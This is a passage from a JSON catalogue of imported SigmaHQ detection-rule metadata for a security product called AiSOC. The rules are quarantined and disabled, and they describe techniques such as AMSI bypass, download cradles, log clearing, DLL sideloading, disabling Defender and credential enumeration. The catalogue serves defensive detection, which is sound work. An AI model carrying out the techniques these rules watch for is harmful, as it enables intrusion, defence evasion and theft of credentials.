"Suspicious Printer Driver Empty Manufacturer", "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-printer-driver-empty-manufacturer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e0813366-0407-449a-9869-a2db1119dc41", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml" } }, { "id": "sigmahq-sigma-e09aed7a-09e0-4c9a-90dd-f0d52507347e", "type": "detection", "name": "Windows WebDAV User Agent", "description": "Detects WebDav DownloadCradle", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-webdav-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e09aed7a-09e0-4c9a-90dd-f0d52507347e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_downloadcradle_webdav.yml" } }, { "id": "sigmahq-sigma-e09eb557-96d2-4de9-ba2d-30f712a5afd3", "type": "detection", "name": "Commands to Clear or Remove the Syslog - Builtin", "description": "Detects specific commands commonly used to remove or empty the syslog", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1565.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/commands-to-clear-or-remove-the-syslog-builtin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e09eb557-96d2-4de9-ba2d-30f712a5afd3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_clear_syslog.yml" } }, { "id": "sigmahq-sigma-e0b06658-7d1d-4cd3-bf15-03467507ff7c", "type": "detection", "name": "Suspicious DotNET CLR Usage Log Artifact", "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dotnet-clr-usage-log-artifact.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" } }, { "id": "sigmahq-sigma-e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", "type": "detection", "name": "Enumeration for Credentials in Registry", "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enumeration-for-credentials-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" } }, { "id": "sigmahq-sigma-e0c69ebd-b54f-4aed-8ae3-e3467843f3f0", "type": "detection", "name": "Renamed Cloudflared.EXE Execution", "description": "Detects the execution of a renamed \"cloudflared\" binary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-cloudflared-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e0c69ebd-b54f-4aed-8ae3-e3467843f3f0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_cloudflared.yml" } }, { "id": "sigmahq-sigma-e0cfaecd-602d-41af-988d-f6ccebb2af26", "type": "detection", "name": "Suspicious Installer Package Child Process", "description": "Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1059.007", "T1071", "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-installer-package-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e0cfaecd-602d-41af-988d-f6ccebb2af26", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_installer_susp_child_process.yml" } }, { "id": "sigmahq-sigma-e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", "type": "detection", "name": "Mesh Agent Service Installation", "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mesh-agent-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml" } }, { "id": "sigmahq-sigma-e0d6c087-2d1c-47fd-8799-3904103c5a98", "type": "detection", "name": "AMSI Bypass Pattern Assembly GetType", "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/amsi-bypass-pattern-assembly-gettype.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" } }, { "id": "sigmahq-sigma-e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", "type": "detection", "name": "Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder", "description": "Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-communication-initiated-to-file-sharing-domains-from-process-located-in.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_susp_file_sharing_domains_susp_folders.yml" } }, { "id": "sigmahq-sigma-e13f668e-7f95-443d-98d2-1816a7648a7b", "type": "detection", "name": "Detected Windows Software Discovery", "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1518" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/detected-windows-software-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e13f668e-7f95-443d-98d2-1816a7648a7b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_software_discovery.yml" } }, { "id": "sigmahq-sigma-e1561947-b4e3-4a74-9bdd-83baed21bdb5", "type": "detection", "name": "Invoke-Obfuscation Via Use Clip", "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-clip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" } }, { "id": "sigmahq-sigma-e15b518d-b4ce-4410-a9cd-501f23ce4a18", "type": "detection", "name": "Suspicious Creation with Colorcpl", "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-creation-with-colorcpl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_colorcpl.yml" } }, { "id": "sigmahq-sigma-e1693bc8-7168-4eab-8718-cdcaa68a1738", "type": "detection", "name": "Suspicious WMIC Execution Via Office Process", "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002", "T1047", "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-wmic-execution-via-office-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml" } }, { "id": "sigmahq-sigma-e16cf0f0-ee88-4901-bd0b-4c8d13d9ee05", "type": "detection", "name": "Bitbucket Global Secret Scanning Rule Deleted", "description": "Detects Bitbucket global secret scanning rule deletion activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-global-secret-scanning-rule-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e16cf0f0-ee88-4901-bd0b-4c8d13d9ee05", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_global_secret_scanning_rule_deleted.yml" } }, { "id": "sigmahq-sigma-e173ad47-4388-4012-ae62-bd13f71c18a8", "type": "detection", "name": "Potential DLL Sideloading Via DeviceEnroller.EXE", "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-via-deviceenroller-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e173ad47-4388-4012-ae62-bd13f71c18a8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml" } }, { "id": "sigmahq-sigma-e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "type": "detection", "name": "Windows Defender Service Disabled - Registry", "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-service-disabled-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" } }, { "id": "sigmahq-sigma-e1d02b53-c03c-4948-b11d-4d00cca49d03", "type": "detection", "name": "Increased Failed Authentications Of Any Type", "description": "Detects when sign-ins increased by 10% or greater.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/increased-failed-authentications-of-any-type.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e1d02b53-c03c-4948-b11d-4d00cca49d03", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_auth_failure_increase.yml" } }, { "id": "sigmahq-sigma-e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", "type": "detection", "name": "File Encryption/Decryption Via Gpg4win From Suspicious Locations", "description": "Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-encryption-decryption-via-gpg4win-from-suspicious-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gpg4win_susp_location.yml" } }, { "id": "sigmahq-sigma-e1f7febb-7b94-4234-b5c6-00fb8500f5dd", "type": "detection", "name": "New Network ACL Entry Added", "description": "Detects that network ACL entries have been added to a route table which could indicate that new attack vectors have been opened up in the AWS account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1686.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-network-acl-entry-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e1f7febb-7b94-4234-b5c6-00fb8500f5dd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_new_acl_entries.yml" } }, { "id": "sigmahq-sigma-e2072cab-8c9a-459b-b63c-40ae79e27031", "type": "detection", "name": "Decode Base64 Encoded Text", "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/decode-base64-encoded-text.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e2072cab-8c9a-459b-b63c-40ae79e27031", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_base64_decode.yml" } }, { "id": "sigmahq-sigma-e20b5b14-ce93-4230-88af-981983ef6e74", "type": "detection", "name": "QuickAssist Execution", "description": "Detects the execution of Microsoft Quick Assist tool \"QuickAssist.exe\". This utility can be used by attackers to gain remote access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/quickassist-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e20b5b14-ce93-4230-88af-981983ef6e74", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_quickassist_execution.yml" } }, { "id": "sigmahq-sigma-e212d415-0e93-435f-9e1a-f29005bb4723", "type": "detection", "name": "Suspicious Remote Child Process From Outlook", "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-remote-child-process-from-outlook.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e212d415-0e93-435f-9e1a-f29005bb4723", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml" } }, { "id": "sigmahq-sigma-e218595b-bbe7-4ee5-8a96-f32a24ad3468", "type": "detection", "name": "Suspicious Curl.EXE Download", "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-curl-exe-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_susp_download.yml" } }, { "id": "sigmahq-sigma-e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", "type": "detection", "name": "Potential MsiExec Masquerading", "description": "Detects the execution of msiexec.exe from an uncommon directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-msiexec-masquerading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml" } }, { "id": "sigmahq-sigma-e2326866-609f-4015-aea9-7ec634e8aa04", "type": "detection", "name": "Shell Execution via Rsync - Linux", "description": "Detects the use of the \"rsync\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-execution-via-rsync-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e2326866-609f-4015-aea9-7ec634e8aa04", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_rsync_shell_execution.yml" } }, { "id": "sigmahq-sigma-e2482f8d-3443-4237-b906-cc145d87a076", "type": "detection", "name": "Disable Internal Tools or Feature in Registry", "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-internal-tools-or-feature-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e2482f8d-3443-4237-b906-cc145d87a076", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_function_user.yml" } }, { "id": "sigmahq-sigma-e2812b49-bae0-4b21-b366-7c142eafcde2", "type": "detection", "name": "Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript", "description": "Detects usage of the WMI class \"Win32_NTEventlogFile\" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-call-to-win32-nteventlogfile-class-psscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e2812b49-bae0-4b21-b366-7c142eafcde2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml" } }, { "id": "sigmahq-sigma-e290b10b-1023-4452-a4a9-eb31a9013b3a", "type": "detection", "name": "LOLBAS Data Exfiltration by DataSvcUtil.exe", "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lolbas-data-exfiltration-by-datasvcutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" } }, { "id": "sigmahq-sigma-e2b5163d-7deb-4566-9af3-40afea6858c3", "type": "detection", "name": "Certificate Private Key Acquired", "description": "Detects when an application acquires a certificate private key", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/certificate-private-key-acquired.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e2b5163d-7deb-4566-9af3-40afea6858c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/capi2/win_capi2_acquire_certificate_private_key.yml" } }, { "id": "sigmahq-sigma-e2e01011-5910-4267-9c3b-4149ed5479cf", "type": "detection", "name": "Potential WWlib.DLL Sideloading", "description": "Detects potential DLL sideloading of \"wwlib.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-wwlib-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e2e01011-5910-4267-9c3b-4149ed5479cf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_wwlib.yml" } }, { "id": 